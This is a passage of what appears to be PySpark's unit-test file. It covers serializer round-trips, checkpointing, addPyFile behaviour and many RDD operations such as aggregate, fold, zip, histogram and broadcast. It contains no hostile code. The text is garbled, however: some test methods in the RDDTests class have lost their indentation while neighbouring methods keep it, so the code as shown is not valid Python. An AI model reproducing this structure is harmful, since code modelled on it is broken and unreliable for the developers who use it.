        # cloudpickle must also serialize the namedtuple *class* itself
        from pyspark.cloudpickle import dumps
        P2 = loads(dumps(P))
        self.assertEqual(p1, P2(1, 3))

    def test_itemgetter(self):
        from operator import itemgetter
        serializer = CloudPickleSerializer()
        data = range(10)
        for getter in (itemgetter(1), itemgetter(0, 3)):
            restored = serializer.loads(serializer.dumps(getter))
            self.assertEqual(getter(data), restored(data))

    def test_function_module_name(self):
        serializer = CloudPickleSerializer()
        func = lambda x: x
        clone = serializer.loads(serializer.dumps(func))
        self.assertEqual(func.__module__, clone.__module__)

    def test_attrgetter(self):
        from operator import attrgetter
        serializer = CloudPickleSerializer()

        class C(object):
            def __getattr__(self, item):
                return item

        d = C()
        for getter in (attrgetter("a"), attrgetter("a", "b")):
            restored = serializer.loads(serializer.dumps(getter))
            self.assertEqual(getter(d), restored(d))
        d.e = C()
        for getter in (attrgetter("e.a"), attrgetter("e.a", "e.b")):
            restored = serializer.loads(serializer.dumps(getter))
            self.assertEqual(getter(d), restored(d))

    # Regression test for SPARK-3415
    def test_pickling_file_handles(self):
        # to be corrected with SPARK-11160
        if not xmlrunner:
            serializer = CloudPickleSerializer()
            out1 = sys.stderr
            self.assertEqual(out1, serializer.loads(serializer.dumps(out1)))

    def test_func_globals(self):

        class Unpicklable(object):
            def __reduce__(self):
                raise Exception("not picklable")

        global exit
        exit = Unpicklable()
        serializer = CloudPickleSerializer()
        self.assertRaises(Exception, lambda: serializer.dumps(exit))

        def foo():
            sys.exit(0)

        self.assertTrue("exit" in foo.__code__.co_names)
        # Referencing the *name* without capturing the unpicklable global
        # must still serialize cleanly.
        serializer.dumps(foo)

    def test_compressed_serializer(self):
        serializer = CompressedSerializer(PickleSerializer())
        try:
            from StringIO import StringIO
        except ImportError:
            from io import BytesIO as StringIO
        io = StringIO()
        serializer.dump_stream(["abc", u"123", range(5)], io)
        io.seek(0)
        self.assertEqual(["abc", u"123", range(5)], list(serializer.load_stream(io)))
        serializer.dump_stream(range(1000), io)
        io.seek(0)
        self.assertEqual(["abc", u"123", range(5)] + list(range(1000)),
                         list(serializer.load_stream(io)))
        io.close()

    def test_hash_serializer(self):
        # Every serializer must be hashable.
        for s in (NoOpSerializer(),
                  UTF8Deserializer(),
                  PickleSerializer(),
                  MarshalSerializer(),
                  AutoSerializer(),
                  BatchedSerializer(PickleSerializer()),
                  AutoBatchedSerializer(MarshalSerializer()),
                  PairDeserializer(NoOpSerializer(), UTF8Deserializer()),
                  CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()),
                  CompressedSerializer(PickleSerializer()),
                  FlattenedValuesSerializer(PickleSerializer())):
            hash(s)
class QuietTest(object):
    """Context manager that raises the log4j root level to FATAL for the block,
    restoring the previous level on exit."""

    def __init__(self, sc):
        self.log4j = sc._jvm.org.apache.log4j

    def __enter__(self):
        root_logger = self.log4j.LogManager.getRootLogger()
        self.old_level = root_logger.getLevel()
        root_logger.setLevel(self.log4j.Level.FATAL)

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
    """Base case giving each test its own local[4] SparkContext, and restoring
    sys.path afterwards."""

    def setUp(self):
        self._old_sys_path = list(sys.path)
        self.sc = SparkContext('local[4]', self.__class__.__name__)

    def tearDown(self):
        self.sc.stop()
        sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
    """Base case sharing one local[4] SparkContext across all tests in the class."""

    @classmethod
    def setUpClass(cls):
        cls.sc = SparkContext('local[4]', cls.__name__)

    @classmethod
    def tearDownClass(cls):
        cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
    """RDD checkpointing against a throwaway checkpoint directory."""

    def setUp(self):
        # NamedTemporaryFile only reserves a unique path; the file itself is
        # removed so Spark can create a directory there.
        self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
        os.unlink(self.checkpointDir.name)
        self.sc.setCheckpointDir(self.checkpointDir.name)

    def tearDown(self):
        shutil.rmtree(self.checkpointDir.name)

    def test_basic_checkpointing(self):
        base = self.sc.parallelize([1, 2, 3, 4])
        flat = base.flatMap(lambda x: range(1, x + 1))
        self.assertFalse(flat.isCheckpointed())
        self.assertTrue(flat.getCheckpointFile() is None)
        flat.checkpoint()
        result = flat.collect()
        time.sleep(1)  # 1 second
        self.assertTrue(flat.isCheckpointed())
        self.assertEqual(flat.collect(), result)
        self.assertEqual("file:" + self.checkpointDir.name,
                         os.path.dirname(os.path.dirname(flat.getCheckpointFile())))

    def test_checkpoint_and_restore(self):
        base = self.sc.parallelize([1, 2, 3, 4])
        flat = base.flatMap(lambda x: [x])
        self.assertFalse(flat.isCheckpointed())
        self.assertTrue(flat.getCheckpointFile() is None)
        flat.checkpoint()
        flat.count()  # forces a checkpoint to be computed
        time.sleep(1)  # 1 second
        self.assertTrue(flat.getCheckpointFile() is not None)
        recovered = self.sc._checkpointFile(flat.getCheckpointFile(),
                                            flat._jrdd_deserializer)
        self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
    """sc.addFile / sc.addPyFile distribution behaviour."""

    def test_add_py_file(self):
        # To ensure that we're actually testing addPyFile's effects, check that
        # this job fails due to `userlibrary` not being on the Python path:
        # disable logging in log4j temporarily
        def func(x):
            from userlibrary import UserClass
            return UserClass().hello()

        with QuietTest(self.sc):
            self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
        # Add the file, so the job should now succeed:
        path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
        self.sc.addPyFile(path)
        self.assertEqual("Hello World!",
                         self.sc.parallelize(range(2)).map(func).first())

    def test_add_file_locally(self):
        path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        self.sc.addFile(path)
        download_path = SparkFiles.get("hello.txt")
        self.assertNotEqual(path, download_path)
        with open(download_path) as test_file:
            self.assertEqual("Hello World!\n", test_file.readline())

    def test_add_py_file_locally(self):
        # Importing the library must fail before addPyFile and work after.
        def func():
            from userlibrary import UserClass

        self.assertRaises(ImportError, func)
        path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
        self.sc.addPyFile(path)
        from userlibrary import UserClass
        self.assertEqual("Hello World!", UserClass().hello())

    def test_add_egg_file_locally(self):
        # Same as above, but the library lives inside a zipped package.
        def func():
            from userlib import UserClass

        self.assertRaises(ImportError, func)
        path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
        self.sc.addPyFile(path)
        from userlib import UserClass
        self.assertEqual("Hello World from inside a package!", UserClass().hello())

    def test_overwrite_system_module(self):
        self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
        import SimpleHTTPServer
        self.assertEqual("My Server", SimpleHTTPServer.__name__)

        def func(x):
            import SimpleHTTPServer
            return SimpleHTTPServer.__name__

        self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
    def test_save_as_textfile_with_utf8(self):
        """saveAsTextFile round-trips text supplied as utf-8 encoded bytes."""
        x = u"\u00A1Hola, mundo!"
        data = self.sc.parallelize([x.encode("utf-8")])
        tempFile = tempfile.NamedTemporaryFile(delete=True)
        tempFile.close()  # only the now-free name is used, as the output directory
        data.saveAsTextFile(tempFile.name)
        raw_contents = b''.join(open(p, 'rb').read()
                                for p in glob(tempFile.name + "/part-0000*"))
        self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
    def test_transforming_pickle_file(self):
        """An RDD read back via pickleFile can be transformed and collected (SPARK-2601)."""
        # Regression test for SPARK-2601
        data = self.sc.parallelize([u"Hello", u"World!"])
        tempFile = tempfile.NamedTemporaryFile(delete=True)
        tempFile.close()
        data.saveAsPickleFile(tempFile.name)
        pickled_file = self.sc.pickleFile(tempFile.name)
        # The regression was a failure here; no assertion on the values needed.
        pickled_file.map(lambda x: x).collect()
    def test_cartesian_on_textfile(self):
        """cartesian() works on RDDs backed by text files."""
        # Regression test (the original comment omitted the ticket number)
        path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        a = self.sc.textFile(path)
        result = a.cartesian(a).collect()
        (x, y) = result[0]
        self.assertEqual(u"Hello World!", x.strip())
        self.assertEqual(u"Hello World!", y.strip())
    def test_deleting_input_files(self):
        """Deleting an input file makes later jobs over it fail (SPARK-1025)."""
        # Regression test for SPARK-1025
        tempFile = tempfile.NamedTemporaryFile(delete=False)
        tempFile.write(b"Hello World!")
        tempFile.close()
        data = self.sc.textFile(tempFile.name)
        filtered_data = data.filter(lambda x: True)
        self.assertEqual(1, filtered_data.count())
        os.unlink(tempFile.name)
        # QuietTest suppresses the expected executor error spam.
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
    def test_aggregate_mutable_zero_value(self):
        """aggregate/treeAggregate must not corrupt a mutable zero value (SPARK-9021)."""
        # Test for SPARK-9021; uses aggregate and treeAggregate to build dict
        # representing a counter of ints
        # NOTE: dict is used instead of collections.Counter for Python 2.6
        # compatibility
        from collections import defaultdict
        # Show that single or multiple partitions work
        data1 = self.sc.range(10, numSlices=1)
        data2 = self.sc.range(10, numSlices=2)
        def seqOp(x, y):
            x[y] += 1
            return x
        def comboOp(x, y):
            for key, val in y.items():
                x[key] += val
            return x
        counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
        counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
        counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
        counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
        ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
        self.assertEqual(counts1, ground_truth)
        self.assertEqual(counts2, ground_truth)
        self.assertEqual(counts3, ground_truth)
        self.assertEqual(counts4, ground_truth)
    def test_aggregate_by_key_mutable_zero_value(self):
        """aggregateByKey must not corrupt a mutable zero value (SPARK-9021)."""
        # Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
        # contains lists of all values for each key in the original RDD
        # list(range(...)) for Python 3.x compatibility (can't use * operator
        # on a range object)
        # list(zip(...)) for Python 3.x compatibility (want to parallelize a
        # collection, not a zip object)
        tuples = list(zip(list(range(10))*2, [1]*20))
        # Show that single or multiple partitions work
        data1 = self.sc.parallelize(tuples, 1)
        data2 = self.sc.parallelize(tuples, 2)
        def seqOp(x, y):
            x.append(y)
            return x
        def comboOp(x, y):
            x.extend(y)
            return x
        values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
        values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
        # Sort lists to ensure clean comparison with ground_truth
        values1.sort()
        values2.sort()
        ground_truth = [(i, [1]*2) for i in range(10)]
        self.assertEqual(values1, ground_truth)
        self.assertEqual(values2, ground_truth)
    def test_fold_mutable_zero_value(self):
        """fold must not corrupt a mutable zero value (SPARK-9021)."""
        # Test for SPARK-9021; uses fold to merge an RDD of dict counters into
        # a single dict
        # NOTE: dict is used instead of collections.Counter for Python 2.6
        # compatibility
        from collections import defaultdict
        counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
        counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
        counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
        counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
        all_counts = [counts1, counts2, counts3, counts4]
        # Show that single or multiple partitions work
        data1 = self.sc.parallelize(all_counts, 1)
        data2 = self.sc.parallelize(all_counts, 2)
        def comboOp(x, y):
            for key, val in y.items():
                x[key] += val
            return x
        fold1 = data1.fold(defaultdict(int), comboOp)
        fold2 = data2.fold(defaultdict(int), comboOp)
        ground_truth = defaultdict(int)
        for counts in all_counts:
            for key, val in counts.items():
                ground_truth[key] += val
        self.assertEqual(fold1, ground_truth)
        self.assertEqual(fold2, ground_truth)
    def test_fold_by_key_mutable_zero_value(self):
        """foldByKey must not corrupt a mutable zero value (SPARK-9021)."""
        # Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
        # lists of all values for each key in the original RDD
        tuples = [(i, range(i)) for i in range(10)]*2
        # Show that single or multiple partitions work
        data1 = self.sc.parallelize(tuples, 1)
        data2 = self.sc.parallelize(tuples, 2)
        def comboOp(x, y):
            x.extend(y)
            return x
        values1 = data1.foldByKey([], comboOp).collect()
        values2 = data2.foldByKey([], comboOp).collect()
        # Sort lists to ensure clean comparison with ground_truth
        values1.sort()
        values2.sort()
        # list(range(...)) for Python 3.x compatibility
        ground_truth = [(i, list(range(i))*2) for i in range(10)]
        self.assertEqual(values1, ground_truth)
        self.assertEqual(values2, ground_truth)
    def test_aggregate_by_key(self):
        """aggregateByKey builds per-key sets across partitions."""
        data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
        def seqOp(x, y):
            x.add(y)
            return x
        def combOp(x, y):
            x |= y
            return x
        sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
        self.assertEqual(3, len(sets))
        self.assertEqual(set([1]), sets[1])
        self.assertEqual(set([2]), sets[3])
        self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
    def test_large_broadcast(self):
        """A multi-megabyte broadcast variable is readable from a task."""
        N = 10000
        data = [[float(i) for i in range(300)] for i in range(N)]
        bdata = self.sc.broadcast(data)  # 27MB
        m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
        self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
    def test_multiple_broadcasts(self):
        """Several broadcasts (one spanning multiple JVM blocks) coexist; re-broadcasting works."""
        N = 1 << 21
        b1 = self.sc.broadcast(set(range(N)))  # multiple blocks in JVM
        r = list(range(1 << 15))
        random.shuffle(r)
        s = str(r).encode()
        checksum = hashlib.md5(s).hexdigest()
        b2 = self.sc.broadcast(s)
        r = list(set(self.sc.parallelize(range(10), 10).map(
            lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
        self.assertEqual(1, len(r))
        size, csum = r[0]
        self.assertEqual(N, size)
        self.assertEqual(checksum, csum)
        # Second round: replace b2 with a fresh payload and verify again.
        random.shuffle(r)
        s = str(r).encode()
        checksum = hashlib.md5(s).hexdigest()
        b2 = self.sc.broadcast(s)
        r = list(set(self.sc.parallelize(range(10), 10).map(
            lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
        self.assertEqual(1, len(r))
        size, csum = r[0]
        self.assertEqual(N, size)
        self.assertEqual(checksum, csum)
    def test_large_closure(self):
        """A large captured closure serializes and executes (SPARK-6886)."""
        N = 200000
        data = [float(i) for i in xrange(N)]
        rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
        self.assertEqual(N, rdd.first())
        # regression test for SPARK-6886
        self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
    def test_zip_with_different_serializers(self):
        """zip() works across RDDs with different serializers (SPARK-4841)."""
        a = self.sc.parallelize(range(5))
        b = self.sc.parallelize(range(100, 105))
        self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
        a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
        b = b._reserialize(MarshalSerializer())
        self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
        # regression test for SPARK-4841
        path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        t = self.sc.textFile(path)
        cnt = t.count()
        self.assertEqual(cnt, t.zip(t).count())
        rdd = t.map(str)
        self.assertEqual(cnt, t.zip(rdd).count())
        # regression test for bug in _reserializer()
        self.assertEqual(cnt, t.zip(rdd).count())
    def test_zip_with_different_object_sizes(self):
        """zip() handles elements whose serialized sizes differ widely (SPARK-5973)."""
        # regress test for SPARK-5973
        a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
        b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
        self.assertEqual(10000, a.zip(b).count())
    def test_zip_with_different_number_of_items(self):
        """zip() rejects RDDs whose partitioning or element counts disagree."""
        a = self.sc.parallelize(range(5), 2)
        # different number of partitions
        b = self.sc.parallelize(range(100, 106), 3)
        self.assertRaises(ValueError, lambda: a.zip(b))
        with QuietTest(self.sc):
            # different number of batched items in JVM
            b = self.sc.parallelize(range(100, 104), 2)
            self.assertRaises(Exception, lambda: a.zip(b).count())
            # different number of items in one pair
            b = self.sc.parallelize(range(100, 106), 2)
            self.assertRaises(Exception, lambda: a.zip(b).count())
            # same total number of items, but different distributions
            a = self.sc.parallelize([2, 3], 2).flatMap(range)
            b = self.sc.parallelize([3, 2], 2).flatMap(range)
            self.assertEqual(a.count(), b.count())
            self.assertRaises(Exception, lambda: a.zip(b).count())
    def test_count_approx_distinct(self):
        """countApproxDistinct stays within tolerance and validates its accuracy argument."""
        rdd = self.sc.parallelize(xrange(1000))
        self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
        self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
        self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
        self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
        rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
        self.assertTrue(18 < rdd.countApproxDistinct() < 22)
        self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
        self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
        self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
        # relative accuracy below the supported minimum must be rejected
        self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
    def test_histogram(self):
        """histogram() with explicit buckets, computed buckets, and error cases."""
        # empty
        rdd = self.sc.parallelize([])
        self.assertEqual([0], rdd.histogram([0, 10])[1])
        self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
        self.assertRaises(ValueError, lambda: rdd.histogram(1))
        # out of range
        rdd = self.sc.parallelize([10.01, -0.01])
        self.assertEqual([0], rdd.histogram([0, 10])[1])
        self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
        # in range with one bucket
        rdd = self.sc.parallelize(range(1, 5))
        self.assertEqual([4], rdd.histogram([0, 10])[1])
        self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
        # in range with one bucket exact match
        self.assertEqual([4], rdd.histogram([1, 4])[1])
        # out of range with two buckets
        rdd = self.sc.parallelize([10.01, -0.01])
        self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
        # out of range with two uneven buckets
        rdd = self.sc.parallelize([10.01, -0.01])
        self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
        # in range with two buckets
        rdd = self.sc.parallelize([1, 2, 3, 5, 6])
        self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
        # in range with two bucket and None
        rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
        self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
        # in range with two uneven buckets
        rdd = self.sc.parallelize([1, 2, 3, 5, 6])
        self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
        # mixed range with two uneven buckets
        rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
        self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
        # mixed range with four uneven buckets
        rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
        self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
        # mixed range with uneven buckets and NaN
        rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
                                   199.0, 200.0, 200.1, None, float('nan')])
        self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
        # out of range with infinite buckets
        rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
        self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
        # invalid buckets
        self.assertRaises(ValueError, lambda: rdd.histogram([]))
        self.assertRaises(ValueError, lambda: rdd.histogram([1]))
        self.assertRaises(ValueError, lambda: rdd.histogram(0))
        self.assertRaises(TypeError, lambda: rdd.histogram({}))
        # without buckets
        rdd = self.sc.parallelize(range(1, 5))
        self.assertEqual(([1, 4], [4]), rdd.histogram(1))
        # without buckets single element
        rdd = self.sc.parallelize([1])
        self.assertEqual(([1, 1], [1]), rdd.histogram(1))
        # without bucket no range
        rdd = self.sc.parallelize([1] * 4)
        self.assertEqual(([1, 1], [4]), rdd.histogram(1))
        # without buckets basic two
        rdd = self.sc.parallelize(range(1, 5))
        self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
        # without buckets with more requested than elements
        rdd = self.sc.parallelize([1, 2])
        buckets = [1 + 0.2 * i for i in range(6)]
        hist = [1, 0, 0, 0, 1]
        self.assertEqual((buckets, hist), rdd.histogram(5))
        # invalid RDDs
        rdd = self.sc.parallelize([1, float('inf')])
        self.assertRaises(ValueError, lambda: rdd.histogram(2))
        rdd = self.sc.parallelize([float('nan')])
        self.assertRaises(ValueError, lambda: rdd.histogram(2))
        # string
        rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
        self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
        self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
        self.assertRaises(TypeError, lambda: rdd.histogram(2))
    def test_repartitionAndSortWithinPartitions(self):
        """repartitionAndSortWithinPartitions partitions by the function and sorts each partition."""
        rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
        repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
        partitions = repartitioned.glom().collect()
        self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
        self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
    def test_external_group_by_key(self):
        """groupByKey spills to an external list when worker memory is capped."""
        self.sc._conf.set("spark.python.worker.memory", "1m")
        N = 200001
        kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
        gkv = kv.groupByKey().cache()
        self.assertEqual(3, gkv.count())
        filtered = gkv.filter(lambda kv: kv[0] == 1)
        self.assertEqual(1, filtered.count())
        self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
        self.assertEqual([(N // 3, N // 3)],
                         filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
        result = filtered.collect()[0][1]
        self.assertEqual(N // 3, len(result))
        # the grouped values must be backed by the external (spilled) container
        self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
    def test_sample(self):
        """sample() is deterministic for a fixed seed and varies across seeds."""
        rdd = self.sc.parallelize(range(0, 100), 4)
        wo = rdd.sample(False, 0.1, 2).collect()
        wo_dup = rdd.sample(False, 0.1, 2).collect()
        self.assertSetEqual(set(wo), set(wo_dup))
        wr = rdd.sample(True, 0.2, 5).collect()
        wr_dup = rdd.sample(True, 0.2, 5).collect()
        self.assertSetEqual(set(wr), set(wr_dup))
        wo_s10 = rdd.sample(False, 0.3, 10).collect()
        wo_s20 = rdd.sample(False, 0.3, 20).collect()
        self.assertNotEqual(set(wo_s10), set(wo_s20))
        wr_s11 = rdd.sample(True, 0.4, 11).collect()
        wr_s21 = rdd.sample(True, 0.4, 21).collect()
        self.assertNotEqual(set(wr_s11), set(wr_s21))
    def test_null_in_rdd(self):
        """JVM nulls deserialize to None under both UTF8 and no-op serializers."""
        jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
        rdd = RDD(jrdd, self.sc, UTF8Deserializer())
        self.assertEqual([u"a", None, u"b"], rdd.collect())
        rdd = RDD(jrdd, self.sc, NoOpSerializer())
        self.assertEqual([b"a", None, b"b"], rdd.collect())
    def test_multiple_python_java_RDD_conversions(self):
        """Python<->Java RDD conversion round-trips twice (SPARK-5361)."""
        # Regression test for SPARK-5361
        data = [
            (u'1', {u'director': u'David Lean'}),
            (u'2', {u'director': u'Andrew Dominik'})
        ]
        data_rdd = self.sc.parallelize(data)
        data_java_rdd = data_rdd._to_java_object_rdd()
        data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
        converted_rdd = RDD(data_python_rdd, self.sc)
        self.assertEqual(2, converted_rdd.count())
        # conversion between python and java RDD threw exceptions
        data_java_rdd = converted_rdd._to_java_object_rdd()
        data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
        converted_rdd = RDD(data_python_rdd, self.sc)
        self.assertEqual(2, converted_rdd.count())
    def test_narrow_dependency_in_join(self):
        """Joins/cogroups of co-partitioned RDDs need fewer stages than mixed ones."""
        rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
        parted = rdd.partitionBy(2)
        self.assertEqual(2, parted.union(parted).getNumPartitions())
        self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
        self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
        # Use job groups so stage counts can be read back per job.
        tracker = self.sc.statusTracker()
        self.sc.setJobGroup("test1", "test", True)
        d = sorted(parted.join(parted).collect())
        self.assertEqual(10, len(d))
        self.assertEqual((0, (0, 0)), d[0])
        jobId = tracker.getJobIdsForGroup("test1")[0]
        self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
        self.sc.setJobGroup("test2", "test", True)
        d = sorted(parted.join(rdd).collect())
        self.assertEqual(10, len(d))
        self.assertEqual((0, (0, 0)), d[0])
        jobId = tracker.getJobIdsForGroup("test2")[0]
        self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
        self.sc.setJobGroup("test3", "test", True)
        d = sorted(parted.cogroup(parted).collect())
        self.assertEqual(10, len(d))
        self.assertEqual([[0], [0]], list(map(list, d[0][1])))
        jobId = tracker.getJobIdsForGroup("test3")[0]
        self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
        self.sc.setJobGroup("test4", "test", True)
        d = sorted(parted.cogroup(rdd).collect())
        self.assertEqual(10, len(d))
        self.assertEqual([[0], [0]], list(map(list, d[0][1])))
        jobId = tracker.getJobIdsForGroup("test4")[0]
        self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
    def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
        """sortByKey distributes data across every output partition (SPARK-5969)."""
        # Regression test for SPARK-5969
        seq = [(i * 59 % 101, i) for i in range(101)]  # unsorted sequence
        rdd = self.sc.parallelize(seq)
        for ascending in [True, False]:
            sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
            self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
            sizes = sort.glom().map(len).collect()
            # every partition must receive at least one element
            for size in sizes:
                self.assertGreater(size, 0)
